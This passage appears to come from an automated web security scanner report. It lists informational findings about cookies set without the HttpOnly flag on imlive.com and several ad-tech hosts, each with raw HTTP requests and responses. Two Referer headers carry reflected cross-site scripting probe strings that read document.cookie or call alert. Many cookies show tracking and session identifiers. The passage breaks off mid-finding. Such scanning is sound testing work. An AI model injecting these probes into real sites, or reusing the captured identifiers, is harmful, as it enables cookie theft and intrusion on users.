Set-Cookie: spvdr=vd=e5a1a417-9342-4ec0-af0e-3d6d3157fbe9&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:19 GMT; path=/
Set-Cookie: ipu=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: ppu=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:25:19 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:19 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


11.546. http://ru.imlive.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ru.imlive.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ligj3o45prg41k55vc4qg52m; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=ligj3o45prg41k55vc4qg52m; path=/; HttpOnly
Set-Cookie: spvdr=vd=5d548b95-834a-4b5b-a38b-38fb7d9bb957&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:20 GMT; path=/
Set-Cookie: iru=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:19 GMT
Connection: close
Content-Length: 20234
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-RU" lang="ru-RU" d
...[SNIP]...

11.547. http://ru.imlive.com/waccess/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ru.imlive.com
Path:   /waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=mdrcej45rm2ieq3do4wugo55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mdrcej45rm2ieq3do4wugo55; path=/; HttpOnly
Set-Cookie: spvdr=vd=3a4b35fa-5d1a-45be-94c9-e53f5978530e&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:21 GMT; path=/
Set-Cookie: iru=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pru=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:25:21 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:20 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


11.548. http://se.imlive.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://se.imlive.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=wl23onyo1tkdis45s1sxe545; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wl23onyo1tkdis45s1sxe545; path=/; HttpOnly
Set-Cookie: spvdr=vd=bb5a5452-c2c5-404a-ad75-499130dd5dbd&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:21 GMT; path=/
Set-Cookie: ise=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:21 GMT
Connection: close
Content-Length: 18020
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv-SE" lang="sv-SE" d
...[SNIP]...

11.549. http://se.imlive.com/waccess/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://se.imlive.com
Path:   /waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rogpqy45fcdiw1ebtdmjcp55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rogpqy45fcdiw1ebtdmjcp55; path=/; HttpOnly
Set-Cookie: spvdr=vd=1f54cc03-0a1d-4a36-ac03-3de445e93bb6&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:23 GMT; path=/
Set-Cookie: ise=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pse=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:25:23 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:22 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


11.550. http://smm.sitescout.com/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smm.sitescout.com
Path:   /click

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click?clid=5369bdc&rand=1296224077262&sid=&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D853584%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000101%2C1220000101%3Bi%3D0%3Bn%3D1220%3B1%3D8%3B2%3D1%3Bs%3D69%3Bg%3D172%3Bm%3D82%3Bw%3D47%3Bi%3D0%3Bu%3DINmz6woBADYAAHrQ5V4AAACH%7E010411%3Bp%3D6%3Bf%3D990638%3Bh%3D922865%3Bk%3Dhttp%3A%2F%2Fhpi.rotator.hadj7.adjuggler.net%2Fservlet%2Fajrotator%2F63722%2F0%2Fcj%2FV127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016%2F HTTP/1.1
Host: smm.sitescout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
SAdBuild: 400
P3P: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml"
Set-Cookie: sadscpax=5369bdc-; Domain=smm.sitescout.com; Expires=Sat, 29-Jan-2011 17:29:42 GMT; Path=/
Location: http://xads.zedo.com/ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/http%3A%2F%2Fconsumertipsonline.net%2Fhealth%2Fus4.php%3Ft%3D59
Content-Length: 0
Date: Fri, 28 Jan 2011 17:05:41 GMT
Connection: close


11.551. http://syndication.mmismm.com/mmtnt.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /mmtnt.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mmtnt.php HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G=10120000000990801741

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:39 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: G=10120000000990801741; expires=Fri, 29-Jan-2016 03:57:39 GMT; path=/; domain=.mmismm.com
Content-Length: 462
Content-Type: text/javascript

document.write('<script type="text/javascript">var D=new Date();var Z=D.getTimezoneOffset();var R="";if(typeof document.referrer!=="undefined"){R="&ref="+encodeURIComponent(document.referrer);}</'+'sc
...[SNIP]...

11.552. http://tag.contextweb.com/TAGPUBLISH/getad.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TAGPUBLISH/getad.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TAGPUBLISH/getad.aspx?tagver=1&cd=1&if=0&ca=VIEWAD&cp=513102&ct=50151&cf=300X250&cn=1&rq=1&fldc=5&dw=1036&cwu=http%3A%2F%2Fevents.cbs6albany.com%2F%3F376e5%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Ea7771aeaee3%3D1&mrnd=63109582 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB23
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2094
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Fri, 28 Jan 2011 17:37:49 GMT
Connection: close
Set-Cookie: V=gFEcJzqCjXJj; domain=.contextweb.com; expires=Sat, 28-Jan-2012 17:37:48 GMT; path=/
Set-Cookie: 513102_300X250_50151=1/28/2011 12:37:49 PM; domain=.contextweb.com; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Sat, 29-Jan-2011 05:00:00 GMT; path=/

var strCreative=''
+ '<script language="javascript" type="text/javascript"> \n'
+ ' document.write(\'<script type="text/javascript" language="javascript" src="http://optimized-by.rubiconproject.co
...[SNIP]...

11.553. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/feeds/invite-media-rtb/tokens/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/invite-media-rtb/tokens/?rt=iframe HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; put_1986=4760492999213801733; put_1994=6ch47d7o8wtv; xdp_ti="26 Jan 2011 20:13:41 GMT"; lm="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; put_1185=3011330574290390485; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; cd=false; dq=12|2|10|0; rdk2=0; ses2=7477^3; csi2=3178295.js^1^1296226112^1296226112&3138805.js^1^1296224077^1296224077; rdk=5804/7477; rdk15=0; ses15=7477^4; csi15=3174529.js^1^1296226115^1296226115&3187311.js^1^1296226114^1296226114&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; rpb=4214%3D1%264894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1%265328%3D1%264554%3D1%265671%3D1; put_2081=CA-00000000456885722

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 28 Jan 2011 14:48:42 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://pixel.invitemedia.com/rubicon_sync?publisher_user_id=004826d0e57cb7385266145a629ee0301cc82296&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/
Content-Length: 0
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 14:48:42 GMT; Path=/
Set-Cookie: dq=13|3|10|0; Expires=Sat, 28-Jan-2012 14:48:42 GMT; Path=/
Set-Cookie: put_2101=""; Domain=.rubiconproject.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lm="28 Jan 2011 14:48:42 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close
Content-Type: text/plain; charset=UTF-8


11.554. http://tap.rubiconproject.com/oz/sensor

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/sensor HTTP/1.1
Host: tap.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="28 Jan 2011 14:48:45 GMT"; ses15=7477^8; put_2132=D8DB51BF08484217F5D14AB47F4002AD; xdp_ti="26 Jan 2011 20:13:41 GMT"; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1185=3011330574290390485; rdk15=0; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1; rdk=5804/7477; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3178300.js^1^1296232904^1296232904&3168345.js^1^1296232903^1296232903&3174529.js^2^1296226115^1296226129&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; dq=15|4|11|0; put_1994=6ch47d7o8wtv; SERVERID=; put_2100=usr3fd748acf5bcab14; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; khaos=GIPAEQ2D-C-IOYY; put_1197=3297869551067506954; au=GIP9HWY4-MADS-10.208.38.239; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; csi2=3174527.js^5^1296226121^1296232915&3138805.js^2^1296224077^1296226130&3178295.js^1^1296226112^1296226112; put_1986=4760492999213801733; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; rdk2=0; ses2=7477^9; cd=false;

Response

HTTP/1.1 204 No Content
Date: Fri, 28 Jan 2011 17:06:05 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 17:06:05 GMT; Path=/
Set-Cookie: dq=16|4|12|0; Expires=Sat, 28-Jan-2012 17:06:05 GMT; Path=/
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 17:06:05 GMT; Path=/
Set-Cookie: lm="28 Jan 2011 17:06:05 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


11.555. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /partner/agent/rubicon/channels.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partner/agent/rubicon/channels.js?cb=oz_onPixelsLoaded&pc=5804/7477 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; xdp_ti="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1185=3011330574290390485; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; cd=false; dq=15|4|11|0; put_2100=usr3fd748acf5bcab14; ses15=7477^8; csi15=3178300.js^1^1296232904^1296232904&3168345.js^1^1296232903^1296232903&3174529.js^2^1296226115^1296226129&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1; put_1197=3297869551067506954; rdk=5804/7477; rdk2=0; ses2=7477^9; csi2=3174527.js^5^1296226121^1296232915&3138805.js^2^1296224077^1296226130&3178295.js^1^1296226112^1296226112

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:56 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript;charset=UTF-8
Content-Length: 943
Cache-control: private
Set-Cookie: khaos=GIPAEQ2D-C-IOYY; Domain=.rubiconproject.com; Expires=Sat, 26-Jan-2019 16:41:56 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close


var oo_profile={
tokenType : "0",
tracking : "",
tags : "Education,Beauty,Family and Parenting,Hobbies and Interests,Travel and Tourism High Affinity,Swing Voters",
tagcloud : [
{ tag
...[SNIP]...

11.556. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/click.txt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/click.txt

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/click.txt HTTP/1.1
Host: this.content.served.by.adshuffle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 01:41:09 GMT
Location: http://search.mylife.com/wp-wsfy?s_cid=$208$DISd42f2251fd9347828c931695680ca71619a6ca0eeddb444d9be1d8e2a327f4b1
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ac1=51f37.693f3=0128111941; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0|c51F37:693F3_0_0_0_20B69D_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sat, 29 Jan 2011 01:41:08 GMT
Content-Length: 228
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:46:09 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://search.mylife.com/wp-wsfy?s_cid=$208$DISd42f2251fd9347828c931695680ca71619a6ca0eeddb444d9be1d8e2a327f4b1">here
...[SNIP]...

11.557. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

